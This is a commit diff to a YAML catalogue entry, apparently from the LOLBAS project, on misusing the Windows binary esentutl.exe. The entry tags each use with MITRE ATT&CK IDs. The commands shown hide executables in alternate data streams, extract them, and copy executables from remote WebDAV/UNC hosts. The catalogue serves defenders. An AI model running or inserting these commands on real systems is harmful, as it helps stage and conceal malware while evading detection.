Changed all OSBinaries according to the new template

yml/OSBinaries/Esentutl.yml

@@ -1,28 +1,59 @@
 ---
 Name: Esentutl.exe
-Description: Copy, Download, Write ADS, Read ADS
-Author: ''
+Description: Binary for working with Microsoft Joint Engine Technology (JET) database
+Author: 'Oddvar Moe'
 Created: '2018-05-25'
-Categories: []
 Commands:
   - Command: esentutl.exe /y C:\folder\sourcefile.vbs /d C:\folder\destfile.vbs /o
     Description: Copies the source VBS file to the destination VBS file.
+    Usecase: Copies files from A to B
+    Category: Copy 
+    Privileges: User
+    MitreID: T1105
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1105
+    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
   - Command: esentutl.exe /y C:\ADS\file.exe /d c:\ADS\file.txt:file.exe /o
     Description: Copies the source EXE to an Alternate Data Stream (ADS) of the destination file.
+    Usecase: Copy file and hide it in an alternate data stream as a defensive counter measure
+    Category: Alternate data streams
+    Privileges: User
+    MitreID: T1096
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1096
+    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
   - Command: esentutl.exe /y C:\ADS\file.txt:file.exe /d c:\ADS\file.exe /o
     Description: Copies the source Alternate Data Stream (ADS) to the destination EXE.
-  - Command: esentutl.exe /y \\82.221.113.85\webdav\file.exe /d c:\ADS\file.txt:file.exe /o
-    Description: Copies the source EXE to the destination Alternate Data Stream (ADS) of the destination file.
-  - Command: esentutl.exe /y \\82.221.113.85\webdav\file.exe /d c:\ADS\file.exe /o
-    Description: Copies the source EXE to the destination EXE file.
+    Usecase: Extract hidden file within alternate data streams
+    Category: Alternate data streams
+    Privileges: User
+    MitreID: T1096
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1096
+    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
+  - Command: esentutl.exe /y \\192.168.100.100\webdav\file.exe /d c:\ADS\file.txt:file.exe /o
+    Description: Copies the remote source EXE to the destination Alternate Data Stream (ADS) of the destination file.  
+    Usecase: Copy file and hide it in an alternate data stream as a defensive counter measure
+    Category: Alternate data streams
+    Privileges: User
+    MitreID: T1096
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1096
+    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
   - Command: esentutl.exe /y \\live.sysinternals.com\tools\adrestore.exe /d \\otherwebdavserver\webdav\adrestore.exe /o
     Description: Copies the source EXE to the destination EXE file
+    Usecase: Use to copy files from one unc path to another
+    Category: Download
+    Privileges: User
+    MitreID: T1096
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1096
+    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
 Full Path:
-  - c:\windows\system32\esentutl.exe
-  - c:\windows\sysWOW64\esentutl.exe
-Code Sample: []
-Detection: []
+  - Path: C:\Windows\System32\esentutl.exe
+  - Path: C:\Windows\SysWOW64\esentutl.exe
+Code Sample: 
+- Code:
+Detection:
+ - IOC: 
 Resources:
-  - https://twitter.com/egre55/status/985994639202283520
-Notes: Thanks to egre55 - @egre55
-
+  - Link: https://twitter.com/egre55/status/985994639202283520
+Acknowledgement:
+  - Person: egre55
+    Handle: '@egre55'
+---